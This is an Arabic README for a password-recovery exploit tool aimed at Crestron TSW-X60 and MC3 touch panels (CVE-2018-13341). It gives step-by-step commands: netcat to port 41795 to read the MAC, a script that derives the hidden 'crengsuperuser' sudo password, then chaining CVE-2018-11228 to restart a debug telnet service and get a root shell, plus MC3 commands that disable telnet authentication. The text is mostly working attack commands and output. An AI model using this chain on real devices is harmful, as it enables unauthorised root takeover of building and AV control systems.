
أداة لاستغلال CVE-2018-13341 واستعادة كلمة مرور الحساب المخفية على أجهزة Crestron
استنادًا إلى اكتشاف ريكي لاوشاي على أجهزة Crestron TSW-X60 و MC3، تهدف هذه الأداة إلى استغلال CVE-2018-13341. باستخدام عنوان MAC للجهاز المستهدف، يمكنك استعادة كلمة مرور الحساب المخفي "crengsuperuser" الذي يتمتع بصلاحيات مرتفعة ويسمح لك بتشغيل أوامر SUDO.
على أجهزة Crestron TSW-X60 < 2.001.0037.001 و MC3 < 1.502.0047.00، يمكن حساب كلمات المرور لحسابات sudo الخاصة باستخدام معلومات يمكن الوصول إليها من قبل المستخدمين العاديين. يمكن للمهاجمين فك تشفير كلمات المرور هذه، مما قد يسمح لهم بتنفيذ استدعاءات API مخفية والخروج من بيئة سطر الأوامر CTP المحصنة بصلاحيات مرتفعة.
يمكن الاتصال ببروتوكول Crestron Toolbox Protocol (CTP) عن طريق الوصول إلى المنفذ 41795 على جهاز TSW-XX60. بعد ذلك، يمكنك استخدام الأمر estat للحصول على عنوان MAC للجهاز:
$ nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> estat
The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
Link Status ....... : OK
DHCP .............. : ON
MAC Address ....... : 00.XX.XX.XX.XX.XX
IP Address ........ : [removed]
Subnet Mask ....... : [removed]
IPV6 Address ...... : [removed]
Default Gateway ... : [removed]
DNS Servers ........ : [removed] | DHCP |
[removed] | DHCP |
تتطلب هذه الأداة وحدة cryptography.
$ pip3 install cryptography
أو
$ pip3 install -r requirements.txt
usage: crestron_getsudopwd.py [-h] [-m MAC]
أداة لتوليد كلمات مرور الحسابات المخفية لـ Crestron
optional arguments:
-h, --help show this help message and exit
-m MAC, --mac MAC عنوان MAC للهدف (بدون نقطتين أو نقاط)
# مثال
$ python3 crestron_getsudopwd.py -m aabbccddeeff
[*] Device MAC address: AABBCCDDEEFF
[*] Password for 'crengsuperuser': RgXkA6Q415puxN0t
يسمح CVE-2018-11228 بتنفيذ أوامر عن بعد (RCE) دون مصادقة عبر خدمة Bash Shell في بروتوكول Crestron Terminal (CTP). بعد الحصول على كلمة مرور الحساب المخفي "crengsuperuser"، يمكنك الحصول على وصول root على نظام Linux الأساسي.
$ nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************
Service telnetd_debug restarted
TSW-760>
ثم، في نافذة جديدة، يمكنك الحصول على وصول root على الجهاز.
$ telnet w.x.y.z
bash-3.2# whoami
root
ملاحظة : هذا المثال مخصص لأجهزة TSW. تختلف العملية قليلاً لأجهزة MC3. يجب عليك استخدام الأوامر التالية لتمكين الصدفة:
SUDO -SN:crengsuperuser -SP:password REGEDIT \\comm\\telnetd addval UseAuthentication DWORD 0ثمSUDO -SN:crengsuperuser -SP:password LAUNCH \\windows\\services.exe /params start tel0:
فيما يلي بعض الموارد المثيرة للاهتمام المتعلقة بهذه الثغرة :